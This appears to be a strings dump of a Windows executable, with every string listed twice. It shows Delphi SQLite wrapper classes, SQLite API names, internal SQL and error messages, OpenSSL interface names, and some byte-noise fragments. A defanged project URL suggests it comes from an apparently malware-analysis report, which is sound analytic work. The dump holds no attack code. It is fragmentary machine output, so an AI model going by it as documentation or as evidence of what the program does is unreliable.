Cipher: failed to change the DB password
;.ud3
;.ud3
~.SWj
~.SWj
~.CB3
~.CB3
TSQLiteRTreeDoubleArray
TSQLiteRTreeDoubleArray
uADPhysSQLiteWrapper
uADPhysSQLiteWrapper
ESQLiteNativeException
ESQLiteNativeException
TSQLiteLib
TSQLiteLib
TSQLiteHandle
TSQLiteHandle
TSQLiteDatabase
TSQLiteDatabase
TSQLiteExtension
TSQLiteExtension
TSQLiteExtensionManager
TSQLiteExtensionManager
TSQLiteCollation
TSQLiteCollation
TSQLiteValueDef
TSQLiteValueDef
TSQLiteValue
TSQLiteValue
TSQLiteStmtVar
TSQLiteStmtVar
TSQLiteBind
TSQLiteBind
TSQLiteColumn
TSQLiteColumn
TSQLiteVariables
TSQLiteVariables
TSQLiteStatement
TSQLiteStatement
TSQLiteFuncVar
TSQLiteFuncVar
TSQLiteInput
TSQLiteInput
TSQLiteInputs
TSQLiteInputs
TSQLiteOutput
TSQLiteOutput
TSQLiteFunction
TSQLiteFunction
TSQLiteFunctionData
TSQLiteFunctionData
TSQLiteExpressionFunction
TSQLiteExpressionFunction
TSQLiteExpressionFunctionData
TSQLiteExpressionFunctionData
TSQLiteRTree
TSQLiteRTree
TSQLiteRTreeData
TSQLiteRTreeData
sqlite3_libversion
sqlite3_libversion
sqlite3_libversion_number
sqlite3_libversion_number
sqlite3_compileoption_used
sqlite3_compileoption_used
sqlite3_compileoption_get
sqlite3_compileoption_get
sqlite3_initialize
sqlite3_initialize
sqlite3_shutdown
sqlite3_shutdown
sqlite3_close
sqlite3_close
sqlite3_errcode
sqlite3_errcode
sqlite3_errmsg
sqlite3_errmsg
sqlite3_extended_result_codes
sqlite3_extended_result_codes
sqlite3_open
sqlite3_open
sqlite3_open_v2
sqlite3_open_v2
sqlite3_key
sqlite3_key
sqlite3_rekey
sqlite3_rekey
sqlite3_trace
sqlite3_trace
sqlite3_profile
sqlite3_profile
sqlite3_busy_timeout
sqlite3_busy_timeout
sqlite3_get_autocommit
sqlite3_get_autocommit
sqlite3_set_authorizer
sqlite3_set_authorizer
sqlite3_update_hook
sqlite3_update_hook
sqlite3_limit
sqlite3_limit
sqlite3_changes
sqlite3_changes
sqlite3_total_changes
sqlite3_total_changes
sqlite3_interrupt
sqlite3_interrupt
sqlite3_last_insert_rowid
sqlite3_last_insert_rowid
sqlite3_enable_shared_cache
sqlite3_enable_shared_cache
sqlite3_release_memory
sqlite3_release_memory
sqlite3_soft_heap_limit
sqlite3_soft_heap_limit
sqlite3_status
sqlite3_status
sqlite3_malloc
sqlite3_malloc
sqlite3_memory_used
sqlite3_memory_used
sqlite3_memory_highwater
sqlite3_memory_highwater
sqlite3_prepare
sqlite3_prepare
sqlite3_finalize
sqlite3_finalize
sqlite3_step
sqlite3_step
sqlite3_reset
sqlite3_reset
sqlite3_column_count
sqlite3_column_count
sqlite3_column_type
sqlite3_column_type
sqlite3_column_name
sqlite3_column_name
sqlite3_column_database_name
sqlite3_column_database_name
sqlite3_column_table_name
sqlite3_column_table_name
sqlite3_column_origin_name
sqlite3_column_origin_name
sqlite3_column_decltype
sqlite3_column_decltype
sqlite3_column_blob
sqlite3_column_blob
sqlite3_column_double
sqlite3_column_double
sqlite3_column_int64
sqlite3_column_int64
sqlite3_column_text
sqlite3_column_text
sqlite3_column_bytes
sqlite3_column_bytes
sqlite3_clear_bindings
sqlite3_clear_bindings
sqlite3_bind_parameter_count
sqlite3_bind_parameter_count
sqlite3_bind_parameter_index
sqlite3_bind_parameter_index
sqlite3_bind_parameter_name
sqlite3_bind_parameter_name
sqlite3_bind_blob
sqlite3_bind_blob
sqlite3_bind_double
sqlite3_bind_double
sqlite3_bind_int64
sqlite3_bind_int64
sqlite3_bind_null
sqlite3_bind_null
sqlite3_bind_text
sqlite3_bind_text
sqlite3_bind_value
sqlite3_bind_value
sqlite3_bind_zeroblob
sqlite3_bind_zeroblob
sqlite3_value_type
sqlite3_value_type
sqlite3_value_blob
sqlite3_value_blob
sqlite3_value_bytes
sqlite3_value_bytes
sqlite3_value_double
sqlite3_value_double
sqlite3_value_int64
sqlite3_value_int64
sqlite3_value_text
sqlite3_value_text
sqlite3_result_blob
sqlite3_result_blob
sqlite3_result_double
sqlite3_result_double
sqlite3_result_error
sqlite3_result_error
sqlite3_result_error_code
sqlite3_result_error_code
sqlite3_result_int64
sqlite3_result_int64
sqlite3_result_null
sqlite3_result_null
sqlite3_result_text
sqlite3_result_text
sqlite3_result_zeroblob
sqlite3_result_zeroblob
sqlite3_create_collation
sqlite3_create_collation
sqlite3_create_function
sqlite3_create_function
sqlite3_user_data
sqlite3_user_data
sqlite3_enable_load_extension
sqlite3_enable_load_extension
sqlite3_load_extension
sqlite3_load_extension
sqlite3_free
sqlite3_free
sqlite3_table_column_metadata
sqlite3_table_column_metadata
sqlite3_progress_handler
sqlite3_progress_handler
sqlite3_declare_vtab
sqlite3_declare_vtab
sqlite3_create_module
sqlite3_create_module
sqlite3_create_module_v2
sqlite3_create_module_v2
sqlite3_vfs_find
sqlite3_vfs_find
sqlite3_vfs_register
sqlite3_vfs_register
sqlite3_vfs_unregister
sqlite3_vfs_unregister
sqlite3_backup_init
sqlite3_backup_init
sqlite3_backup_step
sqlite3_backup_step
sqlite3_backup_finish
sqlite3_backup_finish
sqlite3_backup_remaining
sqlite3_backup_remaining
sqlite3_backup_pagecount
sqlite3_backup_pagecount
sqlite3_wal_hook
sqlite3_wal_hook
sqlite3_wal_autocheckpoint
sqlite3_wal_autocheckpoint
sqlite3_wal_checkpoint
sqlite3_wal_checkpoint
sqlite3_rtree_geometry_callback
sqlite3_rtree_geometry_callback
sqlite3_blob_open
sqlite3_blob_open
sqlite3_blob_close
sqlite3_blob_close
sqlite3_blob_bytes
sqlite3_blob_bytes
sqlite3_blob_read
sqlite3_blob_read
sqlite3_blob_write
sqlite3_blob_write
sqlite3_vtab_config
sqlite3_vtab_config
sqlite3_vtab_on_conflict
sqlite3_vtab_on_conflict
SQLITE_INTEGER
SQLITE_INTEGER
SQLITE_FLOAT
SQLITE_FLOAT
SQLITE_TEXT
SQLITE_TEXT
SQLITE_BLOB
SQLITE_BLOB
SQLITE_NULL
SQLITE_NULL
sqlite3
sqlite3
PRIMARY KEY must be unique
PRIMARY KEY must be unique
ADsqlite3_compare
ADsqlite3_compare
sqlite3_column_xxx
sqlite3_column_xxx
8.ugj
8.ugj
zSql
zSql
sqlite_version
sqlite_version
SQLiteNativeException
SQLiteNativeException
TADPhysSQLiteDriverLink
TADPhysSQLiteDriverLink
uADPhysSQLite
uADPhysSQLite
TADPhysSQLiteDriver
TADPhysSQLiteDriver
TADPhysSQLiteConnection
TADPhysSQLiteConnection
TADPhysSQLiteTransaction
TADPhysSQLiteTransaction
TADPhysSQLitePostEventFunc
TADPhysSQLitePostEventFunc
TADPhysSQLiteEventAlerter
TADPhysSQLiteEventAlerter
TADSQLiteVarInfoRecD
TADSQLiteVarInfoRecD
TADPhysSQLiteCommand
TADPhysSQLiteCommand
@F:SQLite Database|*.sdb;*.db
@F:SQLite Database|*.sdb;*.db
ForeignKeys
ForeignKeys
SQLiteAdvanced
SQLiteAdvanced
foreign_keys
foreign_keys
TADPhysSQLiteEventMessageU
TADPhysSQLiteEventMessageU
DriverID=SQLite
DriverID=SQLite
libeay32.dll
libeay32.dll
ssleay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
X509_STORE_CTX_get_current_cert
des_set_key
des_set_key
sslvrfFailIfNoPeerCert
sslvrfFailIfNoPeerCert
TPasswordEvent
TPasswordEvent
Certificate
Certificate
RootCertFile\
RootCertFile\
CertFile\
CertFile\
KeyFile
KeyFile
OnGetPassword\
OnGetPassword\
EIdOSSLLoadingRootCertError
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
EIdOSSLLoadingKeyError
Open SSL Support DLL Delphi and C Builder interface
Open SSL Support DLL Delphi and C Builder interface
hXXp://VVV.indyproject.org/
hXXp://VVV.indyproject.org/
1993 - 2004
1993 - 2004
https:
https:
\\.\Scsi%d:
\\.\Scsi%d:
deflate 1.0.4 Copyright 1995-1996 Jean-loup Gailly
deflate 1.0.4 Copyright 1995-1996 Jean-loup Gailly
inflate 1.0.4 Copyright 1995-1996 Mark Adler
inflate 1.0.4 Copyright 1995-1996 Mark Adler
8$4,8$4
8$4,8$4
CREATE TABLE sqlite_master(
CREATE TABLE sqlite_master(
sql text
sql text
CREATE TEMP TABLE sqlite_temp_master(
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYHerF
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYHerF
3.7.15
3.7.15
SQLITE_
SQLITE_
d-d-d d:d:d
d-d-d d:d:d
d-d-d
d-d-d
failed to allocate %u bytes of memory
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
failed memory resize %u to %u bytes
922337203685477580
922337203685477580
API call with %s database connection pointer
API call with %s database connection pointer
RowKey
RowKey
GetProcessHeap
GetProcessHeap
OsError 0x%x (%u)
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
delayed %dms for lock/sharing conflict
%s-shm
%s-shm
%s\etilqs_
%s\etilqs_
%s\%s
%s\%s
Recovered %d frames from WAL file %s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
cannot limit WAL size: %s
SQLite format 3
SQLite format 3
invalid page number %d
invalid page number %d
2nd reference to page %d
2nd reference to page %d
Failed to read ptrmap key=%d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
%d of %d pages missing from overflow list starting at %d
failed to get page %d
failed to get page %d
freelist leaf count too big on page %d
freelist leaf count too big on page %d
Page %d:
Page %d:
unable to get the page. error code=%d
unable to get the page. error code=%d
btreeInitPage() returns error code %d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On tree page %d cell %d:
On page %d at right child:
On page %d at right child:
Corruption detected in cell %d on page %d
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Page %d is never used
Pointer map page %d is referenced
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
Outstanding page count goes from %d to %d during this analysis
unknown database %s
unknown database %s
keyinfo(%d
keyinfo(%d
%s(%d)
%s(%d)
%s-mjXXXXXX9XXz
%s-mjXXXXXX9XXz
MJ delete: %s
MJ delete: %s
MJ collide: %s
MJ collide: %s
-mjX9X
-mjX9X
foreign key constraint failed
foreign key constraint failed
unable to use function %s in the requested context
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
bind on a busy prepared statement: [%s]
zeroblob(%d)
zeroblob(%d)
abort at %d in [%s]: %s
abort at %d in [%s]: %s
constraint failed at %d in [%s]
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
cannot open savepoint - SQL statements in progress
no such savepoint: %s
no such savepoint: %s
cannot release savepoint - SQL statements in progress
cannot release savepoint - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_temp_master
sqlite_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
cannot change %s wal mode from within a transaction
database table is locked: %s
database table is locked: %s
statement aborts at %d: [%s] %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open value of type %s
cannot open virtual table: %s
cannot open virtual table: %s
cannot open view: %s
cannot open view: %s
no such column: "%s"
no such column: "%s"
foreign key
foreign key
indexed
indexed
cannot open %s column for writing
cannot open %s column for writing
misuse of aliased aggregate %s
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s.%s
%s: %s.%s
%s: %s.%s
not authorized to use function: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
variable number must be between ?1 and ?%d
too many SQL variables
too many SQL variables
too many columns in %s
too many columns in %s
EXECUTE %s%s SUBQUERY %d
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
misuse of aggregate: %s()
%.*s"%w"%s
%.*s"%w"%s
%s%.*s"%w"
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_trigger
sqlite_rename_parent
sqlite_rename_parent
%s OR name=%Q
%s OR name=%Q
type='trigger' AND (%s)
type='trigger' AND (%s)
sqlite_
sqlite_
table %s may not be altered
table %s may not be altered
there is already another table or index with this name: %s
there is already another table or index with this name: %s
view %s may not be altered
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_altertab_%s
sqlite_stat1
sqlite_stat1
sqlite_stat3
sqlite_stat3
CREATE TABLE %Q.%s(%s)
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
DELETE FROM %Q.%s WHERE %s=%Q
SELECT idx,count(*) FROM %Q.sqlite_stat3 GROUP BY idx
SELECT idx,count(*) FROM %Q.sqlite_stat3 GROUP BY idx
SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat3
SELECT idx,neq,nlt,ndlt,sample FROM %Q.sqlite_stat3
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
invalid name: "%s"
invalid name: "%s"
too many attached databases - max %d
too many attached databases - max %d
database %s is already in use
database %s is already in use
Invalid key value
Invalid key value
unable to open database: %s
unable to open database: %s
no such database: %s
no such database: %s
cannot detach database %s
cannot detach database %s
database %s is locked
database %s is locked
sqlite_detach
sqlite_detach
sqlite_attach
sqlite_attach
%s %T cannot reference objects in database %s
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
object name reserved for internal use: %s
there is already an index named %s
there is already an index named %s
too many columns on %s
too many columns on %s
duplicate column name: %s
duplicate column name: %s
default value of column [%s] is not constant
default value of column [%s] is not constant
table "%s" has more than one primary key
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
CREATE %s %.*s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
sqlite_stat%d
sqlite_stat%d
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
sqlite_stat
sqlite_stat
table %s may not be dropped
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
use DROP VIEW to delete view %s
foreign key on %s should reference only one column of table %T
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
unknown column "%s" in foreign key definition
indexed columns are not unique
indexed columns are not unique
table %s may not be indexed
table %s may not be indexed
views may not be indexed
views may not be indexed
virtual tables may not be indexed
virtual tables may not be indexed
there is already a table named %s
there is already a table named %s
index %s already exists
index %s already exists
sqlite_autoindex_%s_%d
sqlite_autoindex_%s_%d
table %s has no column named %s
table %s has no column named %s
CREATE%s INDEX %.*s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
a JOIN clause is required before %s
unable to identify the object to be reindexed
unable to identify the object to be reindexed
no such collation sequence: %s
no such collation sequence: %s
table %s may not be modified
table %s may not be modified
cannot modify %s because it is a view
cannot modify %s because it is a view
sqlite_source_id
sqlite_source_id
sqlite_log
sqlite_log
sqlite_compileoption_used
sqlite_compileoption_used
sqlite_compileoption_get
sqlite_compileoption_get
foreign key mismatch
foreign key mismatch
table %S has %d columns but %d values were supplied
table %S has %d columns but %d values were supplied
%d values for %d columns
%d values for %d columns
table %S has no column named %s
table %S has no column named %s
%s.%s may not be NULL
%s.%s may not be NULL
constraint %s failed
constraint %s failed
automatic extension loading failed: %s
automatic extension loading failed: %s
foreign_key_list
foreign_key_list
*** in database %s ***
*** in database %s ***
unsupported encoding: %s
unsupported encoding: %s
rekey
rekey
hexkey
hexkey
hexrekey
hexrekey
malformed database schema (%s)
malformed database schema (%s)
%s - %s
%s - %s
unsupported file format
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
%s:%d
ORDER BY clause should come after %s not before
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
no such index: %s
sqlite_subquery_%p_
sqlite_subquery_%p_
no such table: %s
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
no such trigger: %S
-- TRIGGER %s
-- TRIGGER %s
no such column: %s
no such column: %s
cannot VACUUM - SQL statements in progress
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor failed: %s
vtable constructor did not declare schema: %s
vtable constructor did not declare schema: %s
no such module: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
table %s: xBestIndex returned an invalid plan
%s TABLE %s
%s TABLE %s
%s AS %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid=?)
%s (rowid>? AND rowid)
%s (rowid>? AND rowid)
%s (rowid>?)
%s (rowid>?)
%s (rowid)
%s (rowid)
%s VIRTUAL TABLE INDEX %d:%s
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
%s (~%lld rows)
at most %d tables in a join
at most %d tables in a join
cannot use index: %s
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
SQL logic error or missing database
SQL logic error or missing database
unknown operation
unknown operation
large file support is disabled
large file support is disabled
unknown database: %s
unknown database: %s
no such %s mode: %s
no such %s mode: %s
%s mode not allowed: %s
%s mode not allowed: %s
no such vfs: %s
no such vfs: %s
database corruption at line %d of [%.10s]
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
cannot open file at line %d of [%.10s]
no such table column: %s.%s
no such table column: %s.%s
CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)
CREATE TABLE x(%s %Q HIDDEN, docid HIDDEN, %Q HIDDEN)
CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
docid INTEGER PRIMARY KEY
docid INTEGER PRIMARY KEY
%z, 'c%d%q'
%z, 'c%d%q'
CREATE TABLE %Q.'%q_content'(%s)
CREATE TABLE %Q.'%q_content'(%s)
CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
PRAGMA %Q.page_size
PRAGMA %Q.page_size
,%s(x.'c%d%q')
,%s(x.'c%d%q')
FROM '%q'.'%q%s' AS x
FROM '%q'.'%q%s' AS x
,%s(?)
,%s(?)
unrecognized parameter: %s
unrecognized parameter: %s
unrecognized matchinfo: %s
unrecognized matchinfo: %s
unrecognized order: %s
unrecognized order: %s
error parsing prefix parameter: %s
error parsing prefix parameter: %s
missing %s parameter in fts4 constructor
missing %s parameter in fts4 constructor
SELECT %s WHERE rowid = ?
SELECT %s WHERE rowid = ?
malformed MATCH expression: [%s]
malformed MATCH expression: [%s]
SELECT %s ORDER BY rowid %s
SELECT %s ORDER BY rowid %s
illegal first argument to %s
illegal first argument to %s
porter
porter
unknown tokenizer: %s
unknown tokenizer: %s
SELECT %s WHERE rowid=?
SELECT %s WHERE rowid=?
INSERT INTO %Q.'%q_content' VALUES(%s)
INSERT INTO %Q.'%q_content' VALUES(%s)
%s_segments
%s_segments
SELECT %s
SELECT %s
unrecognized matchinfo request: %c
unrecognized matchinfo request: %c
%d %d %d %d
%d %d %d %d
